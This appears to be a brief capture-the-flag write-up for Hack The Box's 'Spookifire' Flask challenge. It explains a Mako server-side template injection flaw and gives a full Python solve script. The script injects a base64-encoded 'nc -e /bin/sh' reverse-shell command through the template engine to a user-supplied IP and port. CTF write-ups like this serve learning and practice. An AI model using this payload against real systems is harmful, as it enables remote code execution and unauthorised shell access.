Post

Spookifire

Posted
By Hssain Aitkadir 1 min read

banner image

Spookifire is a python flask chalenge on Hackthebox

Description:

Simply this challenge takes user input a print it different fornts but the problem is it doesn’t do any sanitizing and it passes the payload to Mako tamplete Engine to be rendered.

Source code:

Download source code

zip password: hackthebox

Vulnerable code:

1

from mako.template import Template

1
2
3
4

    <tbody>
        ${output}
    </tbody>

Solve:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

import base64
import requests
import argparse
 
 

def solve(revshell_ip, revshell_port):
	url = 'http://localhost:1337/'

	rev = f"nc {revshell_ip} {revshell_port} -e /bin/sh"	
	payload = base64.b64encode(rev.encode('utf-8'))
	params = {
		'text': '${self.module.runtime.util.os.system("echo ' + str(payload, "utf-8") + ' | base64 -d| sh")}'
	}
 
	print('\n')
	print(params)
	print('\n')
	try:
		response = requests.get(url, params=params)
		if response.status_code == 200:
			print("Request successful!")
			# print("Response:", response.text)
		else:
			print(f"Request failed with status code: {response.status_code}")
	except requests.RequestException as e:
		print(f"Request failed: {e}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Enter your ip and port to get reverse shell.')
    parser.add_argument('ip', type=str, help='ip to get reverse shell')
    parser.add_argument('port', type=str, help='port to get reverse shell')
    args = parser.parse_args()
    solve(args.ip, args.port)
Hackthebox-Challenges, spookifire
htb ctf pentesting web code-auditing
This post is licensed under CC BY 4.0 by the author.